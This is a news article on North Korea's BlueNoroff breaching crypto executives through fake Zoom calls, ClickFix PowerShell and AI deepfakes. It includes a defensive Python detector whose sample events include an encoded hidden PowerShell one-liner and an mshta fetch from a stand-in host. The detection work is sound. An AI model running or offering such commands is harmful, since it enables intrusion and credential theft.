North Korea’s BlueNoroff Hackers Used AI-Generated Fake Zoom Calls To Breach 100 Crypto Executives

North Korea's BlueNoroff hackers used fake Zoom calls and AI deepfakes to breach a crypto firm and compromise more than 100 Web3 executives worldwide.

Key Points

  • BlueNoroff posed as a fintech lawyer, sent a tampered calendar invite, and steered the target into a counterfeit Zoom call.
  • A ClickFix clipboard trick ran fileless PowerShell that seized credentials and crypto wallet data in under five minutes.
  • Stolen webcam footage fed AI deepfakes that impersonated past victims to bait the next round of targets.

BlueNoroff Hijacks Zoom Calls To Drain Wallets

Researchers at Arctic Wolf traced the monthslong intrusion to BlueNoroff, a financially driven arm of North Korea's Lazarus Group. The campaign struck a North American Web3 company on Jan. 23, 2026, and operators quietly held access for 66 days. Posing as a legal executive at a fintech firm, the attacker sent a Calendly invite for a routine catch-up call scheduled five months ahead.

After the target confirmed, the booking swapped its Google Meet link for a typo-squatted Zoom address that looked almost identical to the real one. Telemetry later showed the victim clicking the bad link three times in four minutes, convinced the software was simply glitching.

ClickFix Prompt Plants Fileless PowerShell

Inside the counterfeit meeting, a pop-up claimed the Zoom SDK needed an update and offered a quick fix, a ruse known as ClickFix. When the victim copied the supplied commands, the page silently rewrote the clipboard and injected a hidden PowerShell payload. That single paste handed the attacker a foothold without any file ever touching disk.

The implant then beaconed to a remote server, scooping up browser logins and crypto wallet data, and lifted active Telegram sessions that were later reused to approach new targets from trusted accounts. From the first click to full system compromise, the entire chain ran in under five minutes, an unusually fast tempo.
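One way a defender might triage the ClickFix stage described above, as an added example written for this article (it is not Arctic Wolf's tooling and nothing in it comes from the report): it scores constructed Sysmon-style process-creation records for the traits a pasted one-liner tends to show, namely a script interpreter launched from an interactive parent such as explorer.exe with hidden-window, policy-bypass, encoded-command or download-cradle switches. The field names, sample events and the explorer.exe-parent assumption are mine.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real telemetry.
# Record 1 models a ClickFix paste run from the Run dialog (explorer.exe parent, assumed here)
# spawning a hidden, policy-bypassing, encoded PowerShell one-liner; record 2 is an mshta
# variant; records 3 and 4 are benign admin and Zoom child-process noise.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://zoom-sdk-update.example/fix.hta"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"parent_image": r"C:\Program Files\Zoom\bin\Zoom.exe",
     "image": r"C:\Program Files\Zoom\bin\CptHost.exe",
     "command_line": "CptHost.exe --pid=4321"},
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe")
INTERACTIVE_PARENTS = ("explorer.exe",)  # Win+R and desktop launches show up as explorer children

# Each command-line trait adds one point; the regexes cover common short and long switch forms.
TRAITS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_cmd", re.compile(r"-e(?:ncodedcommand|nc|c)\b", re.I)),
    ("download_cradle", re.compile(
        r"(?:iex|invoke-expression|downloadstring|invoke-webrequest|irm\b|iwr\b|mshta\s+https?://)", re.I)),
]

def score_event(ev):
    """Return (score, reasons) for one process-creation event; non-interpreters score 0."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    reasons = [label for label, rx in TRAITS if rx.search(ev["command_line"])]
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent")
    return len(reasons), reasons

def find_clickfix_candidates(events, threshold=2):
    """Events scoring at or above threshold are ClickFix-style candidates for analyst triage."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"command_line": ev["command_line"], "score": score, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["command_line"][:60])
```

In production the same scoring would run over PowerShell script-block logs (Event ID 4104) as well, since the decoded payload, not just the launch switches, is where the credential and wallet theft shows up.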

Deepfakes Recycle Victims To Snare New Targets

The fake calls felt convincing because every participant tile showed stolen webcam footage, AI-generated headshots, or deepfake composite video, pulled from a library of more than 100 prior victims across 20 countries. Investigators tied the synthetic faces to OpenAI's GPT-4o model and traced the editing to one operator who left the macOS username "king" in the metadata. Each stolen face then fed the next lure, so every breach made the following attack harder to spot.

The United States accounted for 41% of the identified victims, with Singapore and the United Kingdom next in line. About 80% worked in crypto, blockchain finance, or nearby investment roles, and founders or chief executives made up close to half.

BlueNoroff is no newcomer to this trade. The group surfaced during the 2016 Bangladesh Bank heist, when it moved $81 million, then pivoted to crypto through its long-running SnatchCrypto operation. This campaign shows that the same playbook now runs on AI, raising the bar for every crypto team trying to defend it.

Disclaimer and Risk Warning: The information provided in this article is for educational and informational purposes only and is based on the author's opinion. It does not constitute financial, investment, legal, or tax advice. Cryptocurrency assets are highly volatile and subject to high risk, including the risk of losing all or a substantial amount of your investment. Trading or holding crypto assets may not be suitable for all investors. The views expressed in this article are solely those of the author(s) and do not represent the official policy or position of Yellow, its founders, or its executives. Always conduct your own thorough research (D.Y.O.R.) and consult a licensed financial professional before making any investment decision.